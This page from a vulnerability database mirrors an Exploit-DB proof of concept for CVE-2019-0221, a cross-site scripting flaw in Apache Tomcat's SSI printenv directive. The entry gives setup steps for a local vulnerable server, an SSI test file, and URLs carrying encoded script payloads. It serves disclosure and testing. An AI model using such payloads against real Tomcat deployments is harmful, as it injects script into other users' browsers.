Lucene search

Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)

🗓️ 13 Jul 2021 00:00:00Reported by Central InfoSecType

exploitdb🔗 www.exploit-db.com👁 623 Views

Apache Tomcat 9.0.0.M1 Cross-Site Scripting (XSS) - CVE-2019-022

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 111
OSV	Cross-site scripting in Apache Tomcat	30 May 201903:30	–	osv
OSV	tomcat7 - security update	30 May 201900:00	–	osv
OSV	CVE-2019-0221	28 May 201922:29	–	osv
OSV	tomcat8 - security update	13 Aug 201900:00	–	osv
OSV	USN-6908-1 tomcat vulnerabilities	23 Jul 202414:03	–	osv
OSV	RHSA-2020:0861 Red Hat Security Advisory: Red Hat JBoss Web Server 3.1 Service Pack 8 security update	16 Sep 202403:29	–	osv
OSV	RHSA-2019:3929 Red Hat Security Advisory: Red Hat JBoss Web Server 5.2 security release	16 Sep 202402:40	–	osv
OSV	tomcat8 - security update	27 Dec 201900:00	–	osv
OSV	OPENSUSE-SU-2024:11468-1 tomcat-9.0.36-8.4 on GA media	15 Jun 202400:00	–	osv
OSV	OPENSUSE-SU-2024:13441-1 tomcat10-10.1.14-1.1 on GA media	15 Jun 202400:00	–	osv

# Exploit Title: Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)
# Date: 05/21/2019
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93
# CVE : CVE-2019-0221

# Requirements:

# SSI support must be enabled within Apache Tomcat. SSI support is not enabled by default.

# A file (usually "*.shtml") with the "printenv" SSI directive must exist within the web application.

# The file must be accessible.



# Proof of Concept:

# Install a Java Runtime Environment (JRE)

# Download a vulnerable version of Tomcat and extract the contents

# Modify line 19 of the conf\context.xml file to globally enable privileged context
Context privileged="true">

# Modify conf\web.xml to enable the SSI Servlet as per the Apache Tomcat User Guide

# Put the following code in "webapps/ROOT/ssi/printenv.shtml"
<html>
  <body>
    Echo: <!-- #echo var="QUERY_STRING_UNESCAPED" --> <br/> <br/>
    Printenv: <!-- #printenv -->
  </body>
</html>

# Run Tomcat
cd bin
catalina run

# Call the following URLs to observe the XSS. You may need to use FireFox. Observe the difference between the "echo" directive which escapes properly and the "printenv" directive which does not escape properly
http://localhost:8080/ssi/printenv.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EXSS%3C/h1%3E%3Cbr/%3E%3Cbr/%3E
http://localhost:8080/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

13 Jul 2021 00:00Current

7High risk

Vulners AI Score7

CVSS24.3

CVSS36.1

EPSS0.09193